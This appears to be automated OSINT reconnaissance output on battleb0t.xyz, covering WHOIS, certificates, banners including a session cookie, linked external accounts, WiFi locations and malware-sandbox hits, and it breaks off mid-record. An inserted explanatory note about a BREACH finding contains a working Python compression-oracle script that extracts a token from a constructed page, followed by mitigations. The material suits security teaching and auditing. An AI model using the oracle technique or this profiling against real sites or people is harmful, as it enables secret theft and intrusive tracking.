Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:12:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: CLIENTIFY.NET
Registry Domain ID: 1866957767_DOMAIN_NET-VRSN
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-07-16T08:59:21Z
Creation Date: 2014-07-15T05:59:40Z
Registrar Registration Expiration Date: 2023-07-15T05:59:40Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: Not Available From Registry
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Admin ID: Not Available From Registry
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Registry Tech ID: Not Available From Registry
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=CLIENTIFY.NET
Name Server: JANET.NS.CLOUDFLARE.COM
Name Server: WALT.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:12:14Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
TERMS OF USE: The data contained in this registrar's Whois database, while believed by the
registrar to be reliable, is provided "as is" with no guarantee or warranties regarding its
accuracy. This information is provided for the sole purpose of assisting you in obtaining
information about domain name registration records. Any use of this data for any other purpose
is expressly forbidden without the prior written permission of this registrar. By submitting
an inquiry, you agree to these terms and limitations of warranty. In particular, you agree not
to use this data to allow, enable, or otherwise support the dissemination or collection of this
data, in part or in its entirety, for any purpose, such as transmission by e-mail, telephone,
postal mail, facsimile or other means of mass unsolicited, commercial advertising or solicitations
of any kind, including spam. You further agree not to use this data to enable high volume, automated
or robotic electronic processes designed to collect or compile this data for any purpose, including
mining this data for your own personal or commercial purposes. Failure to comply with these terms
may result in termination of access to the Whois database. These terms may be subject to modification
at any time without notice.
| clientify.net |
| 2023-05-12 02:44:05 | SSL Certificate - Raw Data | No | CertSpotter | 1 | 0 | 1 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
03:97:99:5c:60:ac:40:68:f8:b2:de:0a:67:7a:da:b7:d1:16
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 24 03:02:53 2023 GMT
Not After : May 25 03:02:52 2023 GMT
Subject: CN=fluid.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ed:bc:d0:71:75:f9:c1:51:79:49:f8:25:6c:e2:
4b:7a:05:e1:2b:6c:79:44:98:ff:b2:cc:bc:d7:da:
27:25:29:37:c7:ba:80:cb:e1:7c:b8:4d:37:a2:bc:
93:44:eb:bc:62:ff:47:cb:21:ea:3d:05:4c:04:57:
82:93:5b:a9:25:29:fb:98:33:b0:04:74:aa:bc:9a:
64:5e:c7:e2:6c:e5:ec:2a:e7:40:6b:e1:75:93:39:
b3:cf:b8:e9:11:29:e6:d1:9e:08:56:54:16:9f:c1:
1d:1f:f5:f6:ca:48:3a:94:53:03:1d:bf:52:af:6e:
27:9d:80:8d:f0:57:28:d4:f0:01:34:f4:39:59:4a:
df:9f:00:47:87:9a:39:38:c1:8f:84:8a:02:0b:b2:
6e:5c:36:a2:f6:35:e6:d2:23:6b:29:b1:15:aa:86:
a3:5b:eb:30:cc:af:b8:df:d5:0e:8f:8e:29:7e:0d:
21:28:d0:d2:4c:71:5b:19:01:9b:dc:b9:90:88:7d:
fc:5d:3e:72:44:e6:46:11:dd:e6:fd:a5:42:a3:07:
24:e7:29:d9:29:1c:f3:72:77:8b:cb:0b:df:45:34:
0b:81:a8:00:de:f0:13:74:1b:bf:2f:61:ad:65:73:
29:3e:05:b5:c3:90:28:8c:96:ef:cb:b3:06:ba:9b:
6b:f7
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
C4:85:82:A3:5E:ED:4D:54:E9:0D:BD:02:AC:67:B2:FA:F3:E1:58:3F
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : B7:3E:FB:24:DF:9C:4D:BA:75:F2:39:C5:BA:58:F4:6C:
5D:FC:42:CF:7A:9F:35:C4:9E:1D:09:81:25:ED:B4:99
Timestamp : Feb 24 04:02:53.639 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:28:F1:70:B2:E6:F5:A1:9C:C3:2A:B9:98:
B7:CA:DE:46:06:8A:0D:FD:5D:51:62:6A:9E:AF:A7:18:
F8:56:D1:B0:02:20:21:A4:D3:7B:9B:94:A5:33:57:25:
EA:F9:E9:6B:7D:DB:3E:9B:70:AC:99:47:BB:60:A1:D8:
D4:9F:E0:9F:F4:44
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Feb 24 04:02:53.699 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:3D:E9:FF:70:A3:4B:24:45:DE:32:CD:C1:
EB:D6:68:50:E8:90:39:17:70:65:2F:C3:8E:27:EF:8F:
0A:2C:12:42:02:20:63:BD:B7:88:53:11:AE:74:C0:8C:
3E:DD:9A:2F:D6:E5:34:A4:8C:A2:AB:43:8C:64:7E:9B:
D2:8E:90:08:CE:60
Signature Algorithm: sha256WithRSAEncryption
7e:31:5b:b5:c6:0c:16:27:0b:f5:1a:b3:80:a7:ef:5e:5f:1b:
87:38:b7:8a:be:5c:4b:2a:3f:28:2b:4f:87:5f:c2:b4:d3:b7:
be:f8:28:f5:15:c7:b3:3f:3d:40:b4:03:a4:95:06:01:1a:58:
1f:75:36:4b:ec:65:5a:e0:fd:b0:bf:41:e3:ff:57:4e:dd:05:
47:2c:e5:74:c8:5a:58:19:d6:53:61:f6:8d:0e:19:29:5d:dd:
b2:13:e8:c5:4c:7e:68:dc:f2:b4:05:5a:13:8e:d2:2e:4e:5e:
81:10:a5:86:8f:30:30:f7:61:4a:6f:5c:17:0d:a4:ef:13:02:
05:48:b0:18:ac:9c:df:24:70:12:e3:44:ac:31:54:f5:b6:92:
f4:ec:b6:e7:16:93:23:c7:b8:7e:51:5c:f7:05:33:1c:0e:7a:
b3:3d:ed:21:03:d2:bc:a5:bf:10:81:1f:4c:79:d4:3a:73:b9:
93:9f:57:8b:98:ea:3e:74:39:70:99:3d:3a:c0:f2:4d:e1:55:
ed:dc:49:4e:a6:39:a5:82:ea:2d:6e:e9:17:c6:72:75:ec:10:
72:d0:c9:3e:b9:30:69:bc:2f:70:06:3c:ba:31:b6:c1:0c:45:
e6:92:88:78:56:3a:d4:0c:d2:32:b8:49:37:f3:c4:6d:15:69:
54:99:0a:d9
| battleb0t.xyz |
| 2023-05-12 02:55:05 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5913389a552a51-ORD
Content-Encoding: gzip
| 188.114.97.1 |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Venmo (Category: finance)
https://account.venmo.com/u/login | login |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | Airwolf (Net ID: 00:13:46:15:C7:AA) | 50.8897, 6.0563 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:26:BA:44) | 34.0544, -118.244 |
| 2023-05-12 03:00:56 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.87): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:21 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | github.io | 185.199.108.153 |
| 2023-05-12 02:54:38 | HTTP Headers | No | Censys | 0 | 0 | 3 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5853301ea41251-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 172.67.168.252 |
| 2023-05-12 02:45:35 | Affiliate - Internet Name | No | DNS Raw Records | 1 | 0 | 2 | 0 | None | battleb0t.github.io | www.battleb0t.xyz |
| 2023-05-12 03:01:18 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.161): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:44:49 | Company Name | No | Company Name Extractor | 0 | 0 | 3 | 0 | None | GitHub\, Inc. | C=US,ST=California,L=San Francisco,O=GitHub\, Inc.,CN=*.github.io |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.126 | 35.229.48.116 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | draadjelos54 (Net ID: 00:01:E3:04:A3:37) | 52.3759, 4.8975 |
| 2023-05-12 03:15:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | Pronouns.Page (Category: social)
https://pronouns.page/api/profile/get/Battleb0t?version=2 | Battleb0t |
| 2023-05-12 02:54:30 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | openssh | 64.226.81.43 |
| 2023-05-12 02:54:00 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 403 Forbidden
Date: <REDACTED>
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
X-Frame-Options: SAMEORIGIN
Referrer-Policy: same-origin
Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Vary: Accept-Encoding
Server: cloudflare
CF-RAY: 7c5ccedd4dfe2bc6-FRA
Content-Encoding: gzip
| 104.21.6.166 |
| 2023-05-12 03:23:33 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.12:80 | 188.114.96.0/24 |
| 2023-05-12 02:55:11 | Open TCP Port Banner | No | Censys | 0 | 0 | 2 | 0 | None | HTTP/1.1 200 OK
Connection: close
Content-Type: text/html; charset="utf-8"
Date: <REDACTED>
Cache-Control: no-cache, no-store, must-revalidate, private
Pragma: no-cache
Set-Cookie: whostmgrrelogin=no; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: whostmgrsession=%3a8HJb2gy62wgW5AEl%2cc019e95b194ab8d9598010e513f0ec9b; HttpOnly; path=/; port=2087; secure
Set-Cookie: roundcube_sessid=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: roundcube_sessauth=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: Horde=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/horde; port=2087; secure
Set-Cookie: PPA_ID=expired; HttpOnly; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: imp_key=expired; HttpOnly; domain=87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087; secure
Set-Cookie: Horde=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087
Set-Cookie: horde_secret_key=expired; HttpOnly; domain=.87.248.157.102; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; port=2087
Cache-Control: no-cache, no-store, must-revalidate, private
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
Content-Encoding: gzip
Content-Length: 12408
| 87.248.157.102 |
| 2023-05-12 02:46:25 | Netblock Membership | No | RIPE | 2 | 0 | 2 | 0 | None | 104.21.0.0/20 | 104.21.6.166 |
| 2023-05-12 03:01:30 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.48): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:07:57 | Vulnerability - CVE Medium | Yes | Tool - testssl.sh | 0 | 1 | 2 | 0 | None | CVE-2013-3587
https://nvd.nist.gov/vuln/detail/CVE-2013-3587
Score: 5.9
Description: The HTTPS protocol, as used in unspecified web applications, can encrypt compressed data without properly obfuscating the length of the unencrypted data, which makes it easier for man-in-the-middle attackers to obtain plaintext secret values by observing length differences during a series of guesses in which a string in an HTTP request URL potentially matches an unknown string in an HTTP response body, aka a "BREACH" attack, a different issue than CVE-2012-4929. | 185.199.108.153 |
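A note on reading this finding: testssl.sh reports CVE-2013-3587 (BREACH) whenever the TLS endpoint serves HTTP-compressed responses. Compression is necessary for the attack but not sufficient; the attacker also needs a secret in the response body, attacker-controlled input reflected into that same body, and a way to observe the compressed size of each response. A static page that reflects no attacker input gives no channel for guesses. The following Python script is an added example, not part of the scan output or of testssl.sh, that shows the mechanism the CVE text describes: a constructed HTML page carrying a session token behind the assumed anchor `csrf_token=` and an unescaped reflection of a query string; an oracle that returns only the compressed length; and a byte-by-byte recovery loop that picks the guess which shrinks the response. The compressor uses zlib's `Z_FIXED` strategy (fixed Huffman codes) so that every wrong guess costs exactly one extra literal and the oracle is deterministic; real gzip output uses dynamic Huffman tables, which adds noise that published BREACH tooling handles with repeated tries and padding. The page layout, the token value, the anchor and the reflection point are all constructed here.

```python
"""BREACH-style compression length oracle (CVE-2013-3587), added example.

Nothing here comes from the scan data or from testssl.sh: the target page,
the secret token, the anchor bytes and the reflection point are constructed
for illustration. Fixed Huffman coding (Z_FIXED) makes the oracle exact:
a wrong guess emits the guessed byte as an 8-bit literal, while the correct
guess extends the LZ77 back-reference by one byte instead.
"""
import zlib

HEX = b"0123456789abcdef"
ANCHOR = b"csrf_token="            # assumed bytes that precede the secret in the page
Z_FIXED = getattr(zlib, "Z_FIXED", 4)   # zlib.h value of Z_FIXED, in case the constant is absent


def build_response(secret: bytes, reflected: bytes) -> bytes:
    """Constructed HTML: a per-session secret plus an unescaped reflection of
    attacker-controlled input in the same response body."""
    return (
        b"<html><head><title>Account</title></head><body>\n"
        b'<p>Signed in as alice. <a href="/logout?' + ANCHOR + secret + b'">Log out</a></p>\n'
        b'<form method="post" action="/search"><input name="q"></form>\n'
        b"<p>No results for <b>" + reflected + b"</b></p>\n"
        b"</body></html>\n"
    )


def compressed_len(body: bytes) -> int:
    """What a passive network observer sees: the compressed response size."""
    c = zlib.compressobj(6, zlib.DEFLATED, 15, 8, Z_FIXED)
    return len(c.compress(body) + c.flush())


def oracle_for(secret: bytes):
    """Bind the hidden secret into an oracle so the attack code below never
    reads it directly; it only learns compressed sizes, like a MITM would."""
    def oracle(reflected: bytes) -> int:
        return compressed_len(build_response(secret, reflected))
    return oracle


def recover_secret(oracle, length: int, alphabet: bytes = HEX) -> bytes:
    """Recover the secret one byte at a time: extend the known prefix with each
    candidate and keep the one that makes the compressed response shrink."""
    known = b""
    for _ in range(length):
        for n_pad in range(9):
            # Distinct byte values >= 144 cost 9 bits each under fixed Huffman
            # coding, so every extra pad byte shifts the bit-to-byte alignment
            # and breaks a tie that byte-granular lengths would otherwise hide.
            pad = bytes(range(0xC3, 0xC3 + n_pad))
            sizes = {c: oracle(ANCHOR + known + bytes([c]) + pad) for c in alphabet}
            best = min(sizes.values())
            winners = [c for c, size in sizes.items() if size == best]
            if len(winners) == 1:
                known += bytes(winners)
                break
        else:
            raise RuntimeError("no unique minimum after padding retries")
    return known


if __name__ == "__main__":
    secret = b"3f9a7c21e0b4d6a8"   # constructed sample token
    print(recover_secret(oracle_for(secret), len(secret)))
```

The recovery loop never sees the token; it sees sixteen response sizes per position and picks the smallest. Mitigations follow directly from the three preconditions: disable HTTP compression for responses that carry secrets, keep secrets out of bodies that reflect user input, or mask the secret per response (for example by XORing it with a fresh random value so the bytes in the body never repeat between requests).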
| 2023-05-12 02:44:47 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 3 | 0 | None | Cloudflare | panel.battleb0t.xyz |
| 2023-05-12 02:54:30 | Software Used | Yes | Censys | 0 | 0 | 3 | 0 | None | Debian Linux 10.2 | 64.226.81.43 |
| 2023-05-12 02:45:56 | Physical Location | No | AbstractAPI | 0 | 0 | 4 | 0 | None | Ashburn, Virginia, 20149, United States, North America | 2600:1f18:2489:8201::c8 |
| 2023-05-12 03:19:00 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | wireless (Net ID: 00:01:36:0F:6E:91) | 52.3759, 4.8975 |
| 2023-05-12 03:00:23 | Blacklisted IP Address | Yes | Honeypot Checker | 0 | 1 | 2 | 0 | None | Honeypotproject (188.114.96.1): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.1 |
| 2023-05-12 03:18:53 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | adm734qwe (Net ID: 00:0D:3A:2C:01:71) | 39.0469, -77.4903 |
| 2023-05-12 03:18:56 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | SpeedStream (Net ID: 00:01:24:F0:B4:05) | 37.7813933,-122.3918002 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | SpeedStream (Net ID: 00:01:24:F0:DA:C3) | 37.7642, -122.3993 |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 5 | 0 | 2 | 0 | None | +14805058800 | Domain Name: AYHU.XYZ
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com/
Updated Date: 2023-01-27T12:12:18.0Z
Creation Date: 2022-12-13T18:01:25.0Z
Registry Expiry Date: 2023-12-13T23:59:59.0Z
Registrar: Go Daddy, LLC
Registrar IANA ID: 146
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registrant Organization: Domains By Proxy, LLC
Registrant State/Province: Arizona
Registrant Country: US
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4805058800
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:06.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain Name: ayhu.xyz
Registry Domain ID: D338262912-CNIC
Registrar WHOIS Server: whois.godaddy.com
Registrar URL: https://www.godaddy.com
Updated Date: 2022-12-13T18:01:26Z
Creation Date: 2022-12-13T18:01:25Z
Registrar Registration Expiration Date: 2023-12-13T23:59:59Z
Registrar: GoDaddy.com, LLC
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: CR599348184
Registrant Name: Registration Private
Registrant Organization: Domains By Proxy, LLC
Registrant Street: DomainsByProxy.com
Registrant Street: 2155 E Warner Rd
Registrant City: Tempe
Registrant State/Province: Arizona
Registrant Postal Code: 85284
Registrant Country: US
Registrant Phone: +1.4806242599
Registrant Phone Ext:
Registrant Fax: +1.4806242598
Registrant Fax Ext:
Registrant Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Admin ID: CR599348186
Admin Name: Registration Private
Admin Organization: Domains By Proxy, LLC
Admin Street: DomainsByProxy.com
Admin Street: 2155 E Warner Rd
Admin City: Tempe
Admin State/Province: Arizona
Admin Postal Code: 85284
Admin Country: US
Admin Phone: +1.4806242599
Admin Phone Ext:
Admin Fax: +1.4806242598
Admin Fax Ext:
Admin Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Registry Tech ID: CR599348185
Tech Name: Registration Private
Tech Organization: Domains By Proxy, LLC
Tech Street: DomainsByProxy.com
Tech Street: 2155 E Warner Rd
Tech City: Tempe
Tech State/Province: Arizona
Tech Postal Code: 85284
Tech Country: US
Tech Phone: +1.4806242599
Tech Phone Ext:
Tech Fax: +1.4806242598
Tech Fax Ext:
Tech Email: Select Contact Domain Holder link at https://www.godaddy.com/whois/results.aspx?domain=ayhu.xyz
Name Server: BRETT.NS.CLOUDFLARE.COM
Name Server: LEANNA.NS.CLOUDFLARE.COM
DNSSEC: unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T02:44:06Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
|
| 2023-05-12 03:18:26 | Account on External Site | No | Account Finder | 0 | 0 | 5 | 0 | None | TrackmaniaLadder (Category: gaming)
https://en.tm-ladder.com/Altpapier_rech.php | Altpapier |
| 2023-05-12 02:57:29 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | {u'count': 21, u'search_terms': [{u'id': u'host', u'value': u'34.148.97.127'}], u'result': [{u'environment_id': 160, u'job_id': u'63b721c255cbc7230c114fee', u'analysis_start_time': u'2023-01-05 19:15:14', u'vx_family': u'Phishing site', u'av_detect': u'7', u'environment_description': u'Windows 10 64 bit', u'threat_score': 81, u'verdict': u'malicious', u'submit_name': u'sample.url', u'sha256': u'7e125ee6f3605791a54d1927a8ff9b5031e2472db0075d752ee0cf376a3ebfbb', u'type': None, u'type_short': u'url', u'size': 70}, {u'environment_id': 100, u'job_id': u'63a10748573bed06bf6111f2', u'analysis_start_time': u'2022-12-20 00:52:25', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'6713a11481c6596abd1fd41c2eb24003815ecd499bddb4b5de308a27fc20f828', u'type': None, u'type_short': u'url', u'size': 65}, {u'environment_id': 100, u'job_id': u'6388fef0bb265f2d7e041e56', u'analysis_start_time': u'2022-12-01 19:22:25', u'vx_family': None, u'av_detect': u'0', u'environment_description': u'Windows 7 32 bit', u'threat_score': None, u'verdict': u'no specific threat', u'submit_name': u'sample.url', u'sha256': u'98b60fb56a8304ed629c90d9a6ea6f01428e09d0957a5bda9031a90a92369cb9', u'type': None, u'type_short': u'url', u'size': 47}, {u'environment_id': 100, u'job_id': u'63869de622270442a100e7c2', u'analysis_start_time': u'2022-11-30 